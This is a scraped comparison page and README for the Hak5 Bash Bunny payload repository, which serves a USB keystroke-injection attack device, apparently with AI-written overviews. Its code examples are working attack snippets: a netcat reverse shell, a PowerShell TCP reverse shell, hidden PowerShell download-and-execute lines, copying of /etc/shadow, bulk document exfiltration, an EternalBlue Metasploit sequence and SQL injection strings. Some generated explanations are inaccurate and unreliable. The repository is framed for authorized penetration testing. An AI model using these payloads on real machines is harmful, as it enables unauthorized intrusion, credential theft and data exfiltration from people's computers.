Convert Figma logo to code with AI

hak5 logobashbunny-payloads

The Official Bash Bunny Payload Repository

2,616
1,463
2,616
132
View on GitHub

Top Related Projects

samratashok's avatar

nishang

8,730

Nishang - Offensive PowerShell for red team, penetration testing and offensive security.

trustedsec's avatar

unicorn

3,709

Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

PowerShellMafia's avatar

PowerSploit

11,849

PowerSploit - A PowerShell Post-Exploitation Framework

rapid7's avatar

metasploit-framework

33,972

Metasploit Framework

swisskyrepo's avatar

PayloadsAllTheThings

60,720

A list of useful payloads and bypass for Web Application Security and Pentest/CTF

fortra's avatar

impacket

13,434

Impacket is a collection of Python classes for working with network protocols.

Quick Overview

The hak5/bashbunny-payloads repository is a collection of payloads for the Bash Bunny, a USB attack platform developed by Hak5. It contains various scripts and payloads that can be executed when the Bash Bunny is plugged into a target computer, allowing for automated penetration testing, security assessments, and other cybersecurity-related tasks.

Pros

  • Extensive collection of ready-to-use payloads for various attack scenarios
  • Community-driven project with regular updates and contributions
  • Compatible with multiple operating systems (Windows, macOS, Linux)
  • Well-documented payloads with clear instructions and explanations

Cons

  • Potential for misuse if not handled responsibly
  • Some payloads may become outdated as target systems are patched
  • Requires physical access to the target machine
  • Limited by the capabilities of the Bash Bunny hardware

Code Examples

  1. Example of a simple Windows payload to gather system information:
# Filename: payload.txt
LED SETUP
ATTACKMODE HID
Q DELAY 500
Q GUI r
Q DELAY 100
Q STRING cmd /c "systeminfo > %TEMP%\sysinfo.txt"
Q ENTER
Q DELAY 2000
Q GUI r
Q DELAY 100
Q STRING powershell -WindowStyle Hidden -Command "Get-Content $env:TEMP\sysinfo.txt | Out-File -Encoding ASCII $env:TEMP\sysinfo.txt"
Q ENTER
ATTACKMODE STORAGE
LED FINISH

This payload opens a command prompt, runs the systeminfo command, saves the output to a file, and then converts the file to ASCII encoding for easier exfiltration.

  1. Example of a macOS payload to capture a screenshot:
# Filename: payload.txt
LED SETUP
ATTACKMODE HID
Q DELAY 1000
Q GUI SPACE
Q DELAY 500
Q STRING terminal
Q ENTER
Q DELAY 1000
Q STRING screencapture -x /tmp/screenshot.png
Q ENTER
Q DELAY 1000
Q STRING exit
Q ENTER
ATTACKMODE STORAGE
LED FINISH

This payload opens the Terminal, captures a screenshot using the screencapture command, and saves it to the /tmp directory.

  1. Example of a Linux payload to create a reverse shell:
# Filename: payload.txt
LED SETUP
ATTACKMODE HID
Q DELAY 1000
Q ALT F2
Q DELAY 500
Q STRING gnome-terminal
Q ENTER
Q DELAY 1000
Q STRING nc -e /bin/sh 192.168.1.100 4444
Q ENTER
ATTACKMODE STORAGE
LED FINISH

This payload opens a terminal and establishes a reverse shell connection to the IP address 192.168.1.100 on port 4444 using netcat.

Getting Started

To use these payloads:

  1. Clone the repository: git clone https://github.com/hak5/bashbunny-payloads.git
  2. Choose a payload and copy it to your Bash Bunny's payloads directory.
  3. Rename the payload file to payload.txt in the appropriate switch position folder (e.g., switch1/).
  4. Safely eject the Bash Bunny and set the switch to the corresponding position.
  5. Plug the Bash Bunny into the target machine to execute the payload.

Always ensure you have proper authorization before using these payloads on any system.

Competitor Comparisons

samratashok logo

nishang

8,730

Nishang - Offensive PowerShell for red team, penetration testing and offensive security.

Pros of Nishang

  • Broader scope of PowerShell-based offensive security tools and scripts
  • More versatile, can be used across various platforms and scenarios
  • Regularly updated with new features and improvements

Cons of Nishang

  • Requires more technical knowledge to use effectively
  • Less user-friendly for beginners compared to Bash Bunny's plug-and-play approach
  • May trigger antivirus software more easily due to its well-known signatures

Code Comparison

Nishang (PowerShell):

$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
    $sendback = (iex $data 2>&1 | Out-String )
    $sendback2 = $sendback + "PS " + (pwd).Path + "> "
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()

Bash Bunny Payloads (Bash):

#!/bin/bash
LED R G B
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& {(New-Object Net.WebClient).DownloadFile('http://example.com/payload.ps1', '$env:TEMP\payload.ps1'); powershell -ExecutionPolicy Bypass $env:TEMP\payload.ps1}"
QUACK ENTER
trustedsec logo

unicorn

3,709

Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

Pros of Unicorn

  • More versatile, supporting multiple payload types and encoding methods
  • Easier to use for generating payloads without specialized hardware
  • Regularly updated with new features and improvements

Cons of Unicorn

  • Requires more manual setup and execution compared to BashBunny
  • Limited to software-based attacks, lacking hardware integration
  • May be less stealthy in some scenarios due to software-based nature

Code Comparison

Unicorn payload generation:

unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443

BashBunny payload execution:

LED SETUP
ATTACKMODE HID
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass
QUACK ENTER

While Unicorn focuses on generating payloads for various attack vectors, BashBunny-Payloads are designed for specific hardware-based attacks using the Bash Bunny device. Unicorn offers more flexibility in payload creation, while BashBunny-Payloads provide a streamlined approach for physical access scenarios.

PowerShellMafia logo

PowerSploit

11,849

PowerSploit - A PowerShell Post-Exploitation Framework

Pros of PowerSploit

  • More versatile and can be used on any Windows system with PowerShell
  • Offers a wider range of post-exploitation and reconnaissance tools
  • Actively maintained with regular updates and contributions

Cons of PowerSploit

  • Requires PowerShell execution, which may be restricted in some environments
  • More complex to use, requiring PowerShell scripting knowledge
  • May trigger antivirus or security software more easily due to its nature

Code Comparison

PowerSploit (Get-GPPPassword function):

function Get-GPPPassword {
    [CmdletBinding()]
    Param (
        [Parameter(Mandatory=$false,
        HelpMessage="Credentials to use when connecting to a Domain Controller.")]
        [System.Management.Automation.PSCredential]
        [System.Management.Automation.Credential()]
        $Credential = [System.Management.Automation.PSCredential]::Empty
    )

Bashbunny-payloads (simple exfiltration payload):

#!/bin/bash
LOOT_DIR=/root/udisk/loot/quickcreds
mkdir -p $LOOT_DIR
cp /etc/passwd $LOOT_DIR/
cp /etc/shadow $LOOT_DIR/
LED G

The PowerSploit code demonstrates a more complex PowerShell function for retrieving Group Policy Preferences passwords, while the Bashbunny payload shows a simpler bash script for quick credential exfiltration. PowerSploit offers more advanced capabilities but requires more expertise, whereas Bashbunny payloads are typically simpler and more hardware-specific.

rapid7 logo

metasploit-framework

33,972

Metasploit Framework

Pros of Metasploit-framework

  • Extensive library of exploits and modules for various platforms and vulnerabilities
  • Active community and regular updates, ensuring up-to-date security testing capabilities
  • Supports a wide range of penetration testing tasks beyond just payload delivery

Cons of Metasploit-framework

  • Steeper learning curve due to its comprehensive nature and command-line interface
  • Requires more setup and configuration compared to the plug-and-play nature of Bash Bunny
  • May be overkill for simple USB-based attacks or social engineering scenarios

Code Comparison

Metasploit-framework (Ruby):

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

Bashbunny-payloads (Bash):

LED SETUP
ATTACKMODE HID STORAGE
RUN WIN powershell.exe -WindowStyle Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('http://example.com/payload.ps1')"
LED FINISH

This comparison highlights the different approaches: Metasploit-framework offers a more comprehensive and flexible framework for various attack vectors, while Bashbunny-payloads focuses on quick, USB-based payload delivery with simpler scripting.

swisskyrepo logo

PayloadsAllTheThings

60,720

A list of useful payloads and bypass for Web Application Security and Pentest/CTF

Pros of PayloadsAllTheThings

  • Broader scope covering various attack vectors and techniques
  • More comprehensive documentation with detailed explanations
  • Regularly updated with contributions from a larger community

Cons of PayloadsAllTheThings

  • Less focused on specific hardware (unlike Bash Bunny payloads)
  • May require more adaptation for use in specific scenarios
  • Potentially overwhelming for beginners due to the vast amount of information

Code Comparison

PayloadsAllTheThings (SQL Injection example):

' OR '1'='1
' OR 1 -- -
' OR '1'='1' #

Bash Bunny Payloads (Exfiltration example):

LED STAGE1
ATTACKMODE HID STORAGE
RUN WIN powershell -WindowStyle Hidden -Exec Bypass "mode con:cols=18 lines=1;Get-ChildItem -Path C:\ -Include *.txt,*.pdf,*.doc -File -Recurse -ErrorAction SilentlyContinue | % {Copy-Item $_.FullName -destination $((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot\') -Force}"

The PayloadsAllTheThings example showcases simple SQL injection techniques, while the Bash Bunny Payloads example demonstrates a more complex exfiltration script tailored for the Bash Bunny hardware. This highlights the difference in focus between the two repositories, with PayloadsAllTheThings offering a wider range of attack vectors and Bash Bunny Payloads providing hardware-specific scripts.

fortra logo

impacket

13,434

Impacket is a collection of Python classes for working with network protocols.

Pros of Impacket

  • Comprehensive library for working with network protocols
  • Supports a wide range of protocols (SMB, MSRPC, NTLM, Kerberos, etc.)
  • Actively maintained with regular updates and contributions

Cons of Impacket

  • Steeper learning curve due to its extensive functionality
  • Requires more setup and configuration compared to Bash Bunny payloads
  • Not specifically designed for quick, plug-and-play attacks

Code Comparison

Impacket example (SMB connection):

from impacket.smbconnection import SMBConnection

conn = SMBConnection(target, target)
conn.login(username, password)

Bash Bunny payload example:

LED SETUP
ATTACKMODE HID STORAGE
QUACK GUI r
QUACK DELAY 100
QUACK STRING powershell -WindowStyle Hidden
QUACK ENTER

While Impacket provides a powerful library for network protocol manipulation, Bash Bunny payloads offer simpler, script-based attacks designed for quick execution via USB devices. Impacket is more versatile but requires more expertise, whereas Bash Bunny payloads are easier to deploy but limited to specific attack scenarios.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

Payload Library for the Bash Bunny by Hak5

This repository contains payloads and extensions for the Hak5 Bash Bunny. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.

Payloads here are written in official DuckyScript™ and Bash specifically for the Bash Bunny. Hak5 does NOT guarantee payload functionality. See Legal and Disclaimers

     


View Featured Bash Bunny Payloads and Leaderboard
Get your payload in front of thousands. Enter to win over $2,000 in prizes in the Hak5 Payload Awards!

                       

Table of contents

Shop

Getting Started

Documentation / Learn More

Community

Got Questions? Need some help? Reach out:

Additional Links

Follow the creators

Korben's Socials

Darren's Socials


About the Bash Bunny

Linux machine in a USB. By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits.





image

ADVANCED ATTACKS

For the sake of convenience, computers trust a number of devices. Flash drives, Ethernet adapters, serial devices and keyboards to name a few. These have become mainstays of modern computing. Each has their own unique attack vectors. When combined? The possibilities are limitless. The Bash Bunny is all of these things, alone – or in combination – and more!

image

SIMPLE PAYLOADS

Each attack, or payload, is written in a simple Ducky Script™ language consisting of text files. This repository is home to a growing library of community developed payloads. Staying up to date with all of the latest attacks is just a matter of downloading files from git. Then loading ’em onto the Bash Bunny just as you would any ordinary flash drive.

image

SIMPLE POWERFUL HARDWARE

It's a full featured Linux box that'll run your favorite tools even faster now thanks to the optimized quad-core CPU, desktop-class SSD and doubled RAM. Choose and monitor payloads with the selection switch and RGB LED. Access an unlocked root terminal via dedicated Serial console. Exfiltrate gigs of loot via MicroSD. Even remotely trigger or geofence payloads via Bluetooth.

Build your payloads with PayloadStudio

Take your DuckyScript™ payloads to the next level with this full-featured, web-based (entirely client side) development environment.

Payload studio features all of the conveniences of a modern IDE, right from your browser. From syntax highlighting and auto-completion to live error-checking and repo synchronization - building payloads for Hak5 hotplug tools has never been easier!

Supports your favorite Hak5 gear - USB Rubber Ducky, Bash Bunny, Key Croc, Shark Jack, Packet Squirrel & LAN Turtle!


Become a PayloadStudio Pro and Unleash your hacking creativity!
OR
Try Community Edition FREE


Payload Studio Themes Preview GIF


Payload Studio Autocomplete Preview GIF

Disclaimer

Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.

Contributing


View Featured Payloads and Leaderboard

Please adhere to the following best practices and style guides when submitting a payload.

Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.

Please include all resources required for the payload to run. If needed, provide a README.md in the root of your payload's directory to explain things such as intended use, required configurations, or anything that will not easily fit in the comments of the payload.txt itself. Please make sure that your payload is tested, and free of errors. If your payload contains (or is based off of) the work of other's please make sure to cite their work giving proper credit.

Purely Destructive payloads will not be accepted. No, it's not "just a prank".

Subject to change. Please ensure any submissions meet the latest version of these standards before submitting a Pull Request.

Naming Conventions

Please give your payload a unique, descriptive and appropriate name. Do not use spaces in payload, directory or file names. Each payload should be submit into its own directory, with - or _ used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.

Staged Payloads

"Staged payloads" are payloads that download code from some resource external to the payload.txt.

While staging code used in payloads is often useful and appropriate, using this (or another) github repository as the means of deploying those stages is not. This repository is not a CDN for deployment on target systems.

Staged code should be copied to and hosted on an appropriate server for doing so by the end user - Github and this repository are simply resources for sharing code among developers and users. See: GitHub acceptable use policies

Additionally, any source code that is intended to be staged (by the end user on the appropriate infrastructure) should be included in any payload submissions either in the comments of the payload itself or as a seperate file. Links to staged code are unacceptable; not only for the reasons listed above but also for version control and user safety reasons. Arbitrary code hidden behind some pre-defined external resource via URL in a payload could be replaced at any point in the future unbeknownst to the user -- potentially turning a harmless payload into something dangerous.

Including URLs

URLs used for retrieving staged code should refer exclusively to example.com using a bash variable in any payload submissions see Payload Configuration section below.

Staged Example

Example scenario: your payload downloads a script and the executes it on a target machine.

  • Include the script in the directory with your payload
  • Provide instructions for the user to move the script to the appropriate hosting service.
  • Provide a bash variable with the placeholder example.com for the user to easily configure once they have hosted the script

Simple Example of this style of payload

Payload Configuration

Be sure to take the following into careful consideration to ensure your payload is easily tested, used and maintained. In many cases, payloads will require some level of configuration by the end payload user.

  • Abstract configuration(s) for ease of use. Use bash assignment variables where possible.
  • Remember to use PLACEHOLDERS for configurable portions of your payload - do not share your personal URLs, API keys, Passphrases, etc...
  • URLs to staged payloads SHOULD NOT BE INCLUDED. URLs should be replaced by example.com. Provide instructions on how to specific resources should be hosted on the appropriate infrastructure.
  • Make note of both REQUIRED and OPTIONAL configuration(s) in your payload using bash comments at the top of your payload or "inline" where applicable.
Example: 
	BEGINNING OF PAYLOAD 
	... Payload Documentation... 

	# CONFIGURATION
	# REQUIRED - Provide URL used for Example
	MY_TARGET_URL="example.com"

	#  OPTIONAL - How long until payload starts; default 5s
	BOOT_DELAY="5000"

	QUACK DELAY $BOOT_DELAY
	...
	QUACK STRING $MY_TARGET_URL
	...

Payload Documentation

Payloads should begin with # bash comments specifying the title of the payload, the author, the target, and a brief description.

Example:
	BEGINNING OF PAYLOAD

	# Title: Example Payload
	# Author: Korben Dallas
	# Description: Opens hidden powershell and
	# Target: Windows 10
	# Props: Hak5, Darren Kitchen, Korben
	# Version: 1.0
	# Category: General

Binaries

Binaries may not be accepted in this repository. If a binary is used in conjunction with the payload, please document where it or its source may be obtained.

Configuration Options

Configurable options should be specified in variables at the top of the payload.txt file

# Options
RESPONDER_OPTIONS="-w -r -d -P"
LOOTDIR=/root/udisk/loot/quickcreds

LED

The payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or ATTACKMODE.

# Initialization
LED SETUP
GET SWITCH_POSITION
GET HOST_IP

# Attack
LED ATTACK
ATTACKMODE HID ECM_ETHERNET

Stages and States

Stages should be documented with comments

# Keystroke Injection Stage
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available
GET HOST_IP
LED STAGE1
ATTACKMODE HID
RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"while (\$true) { If (Test-Connection $HOST_IP -count 1) { \\\\$HOST_IP\\s\\s.ps1; exit } }\""

Common payload states include a SETUP, with may include a FAIL if certain conditions are not met. This is typically followed by either a single ATTACK or multiple STAGEs. More complex payloads may include a SPECIAL function to wait until certain conditions are met. Payloads commonly end with a CLEANUP phase, such as moving and deleting files or stopping services. A payload may FINISH when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to LED states.

Legal

Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use.

Bash Bunny and DuckyScript are the trademarks of Hak5 LLC. Copyright © 2010 Hak5 LLC. All rights reserved. No part of this work may be reproduced or transmitted in any form or by any means without prior written permission from the copyright owner. Bash Bunny and DuckyScript are subject to the Hak5 license agreement (https://hak5.org/license) DuckyScript is the intellectual property of Hak5 LLC for the sole benefit of Hak5 LLC and its licensees. To inquire about obtaining a license to use this material in your own project, contact us. Please report counterfeits and brand abuse to legal@hak5.org. This material is for education, authorized auditing and analysis purposes where permitted subject to local and international laws. Users are solely responsible for compliance. Hak5 LLC claims no responsibility for unauthorized or unlawful use. Hak5 LLC products and technology are only available to BIS recognized license exception ENC favorable treatment countries pursuant to US 15 CFR Supplement No 3 to Part 740.

See also:

Hak5 Software License Agreement

Terms of Service

Disclaimer

As with any script, you are advised to proceed with caution.

Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness.